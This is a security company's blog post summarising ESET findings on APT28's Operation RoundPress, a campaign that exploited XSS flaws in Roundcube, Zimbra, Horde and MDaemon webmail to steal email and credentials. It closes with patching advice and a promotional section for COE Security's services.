A major wave of cyber espionage campaigns has once again brought the spotlight onto outdated and vulnerable webmail servers across the globe. Dubbed Operation RoundPress, the campaign is believed to be the work of APT28, a Russian state-sponsored threat actor known by many names such as Fancy Bear, Sednit, TA422, and Forest Blizzard. According to cybersecurity firm ESET, this sophisticated operation has been ongoing since 2023 and continues to exploit security flaws in popular webmail platforms like Roundcube, Horde, Zimbra, and MDaemon.
APT28’s objective? To infiltrate sensitive government and defense networks, steal confidential emails, and exfiltrate user credentials all without leaving a visible trace.
Unpacking Operation RoundPress
The attackers used cross-site scripting (XSS) vulnerabilities in webmail clients to deploy SpyPress, a malicious JavaScript-based payload designed to steal email credentials, contact lists, and entire email conversations. Once a victim opens the attacker’s carefully crafted email, SpyPress executes within the webmail interface, granting the attacker access to sensitive data stored in the victim’s mailbox.
In some cases, especially with Roundcube, SpyPress even creates Sieve rules that forward every incoming email to attacker-controlled accounts a chilling technique that persists even after the malicious email has been deleted or the script stopped running.
While vulnerabilities like CVE-2023-43770 (Roundcube) and CVE-2024-27443 (Zimbra) had been previously disclosed and patched, ESET found that the vulnerability in MDaemon (CVE-2024-11182) was exploited as a zero-day, meaning it was used before any public patch was available. This underscores the persistent gap between vulnerability discovery and real-world patch implementation.
Who’s Being Targeted?
The majority of the targets are governmental entities and defense contractors in Eastern Europe, especially those aiding Ukraine. Organizations in countries like Bulgaria, Romania, Greece, Serbia, Cyprus, Cameroon, Ecuador, and others have also been impacted. These include military, government, and academic institutions, highlighting a broad geographic and sectoral reach.
APT28’s repeated focus on email systems is not new. Since at least 2020, this group and others like GreenCube and Winter Vivern have been exploiting flaws in Roundcube and similar platforms. Their preference for XSS attacks stems from their simplicity one email is all it takes, and the victim doesn’t even need to download an attachment.
Why Webmail Servers Are a Goldmine for Attackers
Email remains a vital communication medium for most organizations, especially in sectors like defense, government, academia, and critical infrastructure. However, many entities fail to regularly patch or update their webmail software, leaving old vulnerabilities open for exploitation.
XSS-based attacks, like the ones seen in Operation RoundPress, are especially dangerous because they can be triggered remotely and executed silently within the user’s browser window. As a result, attackers can steal credentials and confidential communication without deploying complex malware or launching visible attacks.
Conclusion
Operation RoundPress is a sobering reminder that email security should never be an afterthought. The success of this campaign relied not on groundbreaking malware, but on exploiting known and in some cases, already patched vulnerabilities. For organizations in defense, government, healthcare, financial services, manufacturing, and education, this incident reinforces the need for proactive security measures.
Keeping webmail software updated, training employees on phishing awareness, and deploying advanced threat detection solutions can be the difference between a secure environment and a breached inbox.
About COE Security
COE Security partners with organizations in financial services, healthcare, retail, manufacturing, and government to secure AI-powered systems and ensure compliance. Our offerings include:
- AI-enhanced threat detection and real-time monitoring
- Data governance aligned with GDPR, HIPAA, and PCI DSS
- Secure model validation to guard against adversarial attacks
- Customized training to embed AI security best practices
- Penetration Testing (Mobile, Web, AI, Product, IoT, Network & Cloud)
- Secure Software Development Consulting (SSDLC)
- Customized CyberSecurity Services
In light of campaigns like Operation RoundPress, COE Security now offers specialized services to secure email infrastructure, conduct webmail vulnerability assessments, and implement XSS mitigation strategies. We help organizations proactively identify and patch zero-day and known vulnerabilities in their communication systems to avoid being the next target.